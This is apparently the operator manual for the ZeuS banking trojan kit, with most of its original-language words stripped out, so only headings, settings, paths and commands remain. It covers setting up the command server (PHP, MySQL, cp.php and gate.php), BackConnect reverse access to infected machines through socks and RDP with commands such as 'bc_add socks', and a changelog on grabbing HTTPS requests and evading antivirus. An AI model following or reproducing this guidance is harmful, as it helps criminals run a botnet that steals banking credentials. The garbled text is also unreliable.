
==============
=  =
==============

1.   .
2.  .
  2.1. HTTP-.
  2.2.  PHP.
  2.3. MySQL-.
  2.4.  .
    2.4.1. .
    2.4.2. .
    2.4.3.  /system/fsarc.php.
3.  .
4.   BackConnect.
5.  .
6. F.A.Q.
7. .

==============================
= 1.   . =
==============================
ZeuS -           Windows.  
  "", "", "".      ,    
      "". 

     WinAPI  UserMode (Ring3),  ,    
-     Ring0.        
   Windows.     ,  
   Windows.

   Visual C++  9.0+,      
 msvcrt, ATL, MFC, QT  ..       (  ):
  1.  (       ..),
  2.        (  ,     ..),
  3.      (   while(1){..}, for(int i = 0; i < strlen(str); i++){..}).

   :
  1.     TCP.
     1.1.  FTP    .
     1.2.  POP3    .
     1.3.      ( ).
  
  2.  HTTP/HTTPS   wininet.dll, ..     
     .   Internet Explorer ( ), Maxton,  ..
     2.1.  ..
     
  3.  .
     3.1 Socks4/4a/5.
     3.2    (RDP, Socks, FTP, ...)   .  
            ,    NAT, , ,  
            .
     3.3      .

=========================
= 2.  . =
=========================
     ,     ,
   .     " "  "VDS", ..
  ,     ,      
   .   " " (),   
:

1. 2 .
2. 2x   2, 
3. SATA  7200rpm+

    HTTP-   PHP + Zend Optimizer,  MySQL-. 

:  Windows-   ()   :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\MaxUserPort=dword:65534

---------------------
- 2.1. HTTP-. -
---------------------
  HTTP-  :  nix- - Apache   2.2, 
Windows- - IIS   6.0.   HTTP-  80  443  (
    ,  /     ,
 ).

 Apache: http://apache.org/dyn/closer.cgi
 IIS: http://www.iis.net/

---------------------------
- 2.2.  PHP. -
---------------------------
      PHP 5.2.6.    
 ,    .       5.2.

     php.ini:

safe_mode = Off
magic_quotes_gpc = Off
magic_quotes_runtime = Off
memory_limit = 256M  ; .
post_max_size = 100M ; .

     :

display_errors = Off

   Zend Optimizer (  ,   
).    3.3.

   PHP  HTTP-  CGI.

 PHP: http://www.php.net/downloads.php
 Zend Optimizer: http://www.zend.com/en/products/guard/downloads

----------------------
- 2.3. MySQL-. -
----------------------
MySQL       .     5.1.30,  
 ,            
.        MyISAM,   
    ,     .

      MySQL- (my  my.ini):

max_connections=2000 # 

 MySQL: http://dev.mysql.com/downloads/

---------------------------
- 2.4.  . -
---------------------------

2.4.1. .
*****************
   :
/install           - .
/system            -  .
/system/fsarc.php  -      ( 2.4.3).
/system/config.php -  .
/theme             -   (),  ,   .
cp.php             -    .
gate.php           -   .
index.php          -      .

         server[php].    
          HTTP.      
FTP,        .

 nix-  :
/.      - 777
/system - 777
/tmp    - 777

 Windows-:
\system -      ,        
           HTTP.  IIS   IUSR_*.
\tmp    -     \system.

     ,       URL
http:////install/index.php.   ,    
 (   )   ,    , 
     .

 ,    install,    cp.php (  
 )  gate.php (  )       ( 
).

       ,    URL 
 cp.php.

2.4.2. .
******************
       ,     ,  
  :

1)        .
2)   cp.php  gate.php        
     .
3)   ,        2.4.
4)      URL http:////install/index.php, 
     .       
    ,    ,       .
5)     .

2.4.3.  /system/fsarc.php.
******************************
         .    
    "::  " (reports_files),    
      .       Zip,  
  Windows  nix,      ,      
,      .         
 .

 Zip: http://www.info-zip.org/Zip.html.

======================
= 3.  . =
======================

===========================
= 4.   BackConnect =
===========================
  BackConnect    .

IP BackConnect- : 192.168.100.1 
  : 4500
   : 1080

1)   (zsbcs.exe  zsbcs64.exe)     IP 
   ,    ,      ,   
       .  zsbcs.exe listen -cp:1080 -bp:4500,
    1080 -  , 4500 -   .

2)     bc_add service server_host server_port,  service - 
      * ,      . 
   
   *      socks,      
    Socks-.

   server_host - ,     .     IPv4,
                 IPv6,  .
   server_port - ,     cp  .    4500.

   : bc_add socks 192.168.100.1 4500 -     socks,
           bc_add 3389  192.168.100.1 4500 -     rdp.

3)       ,      
       (   ). 
    ,       "Accepted new conection from bot...".

4)   ,       . ..  
         (   1080). ,   
    socks,        Socks-,    3389, 
      192.168.100:1080    RDP.

5)  ,     BackConnect     ,  
    bc_del service server_host server_port,      
    bc_add,   .     . 
   '*'  '?'.

   : bc_del * * * -   BackConnect',   .
             bc_del * 192.168.* *   BackConnect,     IP 192.168.*.
             bc_del 3389 192.168.100.1 4500 -    BackConnect.

: 
1)      BackConnect' (.. bc_add),       
    IP + Port.      ,    .
2)   BackConnect',      .
3)    ( ,    ..),    
     (   PC),     BackConnect   
   (.. bc_del).
4)   service  bc_add,         127.0.0.1.
5)    IPv6,          
   .
6)      wine.   elf     
   .   
7)      bp     (80, 8080,
   443  ..), ..         .
8)             .
9)        ,    NAT, .. 
    Windows  ,      .

:        .

======================
= 5.  . =
======================
 :
  [*] - .
  [-] - .
  [+] - .

[ 1.2.0.0, 20.12.2008]
  :
    [*]      chm-,      .
    [+]          ,    
        /.
    [+]  ,   ,     RC4   
         .
    [*]     <-> . ,    .
  
  :
    [-]  ,       Windows.
    [*]   PE-,  PE-     
           MS Linker 9.0.
    [*]      .
    [*]    .
    [*]     .
    [*]      .
    [*] Socks  LC     .
  
   :
    [*]      BETA.
    [*]    MySQL.
    [*]       UTF-8 (   
         ).
    [*]  .

[ 1.2.1.0, 30.12.2008]
  :
    [*] BOFA Answers    BLT_GRABBED_HTTP ( BLT_HTTPS_REQUEST).
    [-]     .
    [-]      ~550 .
    [-]      :     POST-, 
              ( ~1 )   
         ( ),    -    
        .
  
  :  
    [+]      BLT_HTTP_REQUEST  BLT_HTTPS_REQUEST   SBCID_PATH_SOURCE
        (   path_source)   URL.
  
   :
    [*]  redir.php.

[ 1.2.2.0, 11.03.2009]
  :
    [-]    HTTP-      . 
             wininet.dll,   
           wininet.dll,   ,   
         .
    [+]   HTTP-,       .
          ,     HTTP-.
    [+]   PE-.

[ 1.2.3.0, 28.03.2009]
  :
    [-]    ,     Avira.

  :  
    [*]     .
  
   :
    [*]    .
    [*]    XHTML 1.0 Strict ( IE  ).
    [*]            - 
        (  ).
    [*]  .

[ 1.2.4.0, 02.04.2009]
  :
    [+]    HTTP,  User-Agent    Internet Explorer,  
           .  -  User-Agent', 
          ,    .

   :
    [-]    ,   0-31  127-159.

=============
= 6. F.A.Q. =
=============
Q:     ?
A: a.b.c.d
    a -     . 
    b -  ,        
        .
    c -  , ,  .
    d -        a.b.c.

Q:    Bot ID?
A: Bot ID    : %name%_%number%,  name -   ( 
   GetComputerName),  number -  ,       .

Q:       (RC4),    (RSA)?
A:  ,      ,     
   .   RSA ,          ,  
      .       (  
   )?

Q:   /  ,  ?
A:  ,    2.5.

===========
= 7.  =
===========
M: ZeuS  DLL   .
A: .     PE  (exe). Dll, sys  ..     
    - .      ,      
    ,     .
   
M: ZeuS  COM ()   Internet Explorer.
A: .      WinAPI  wininet.dll.
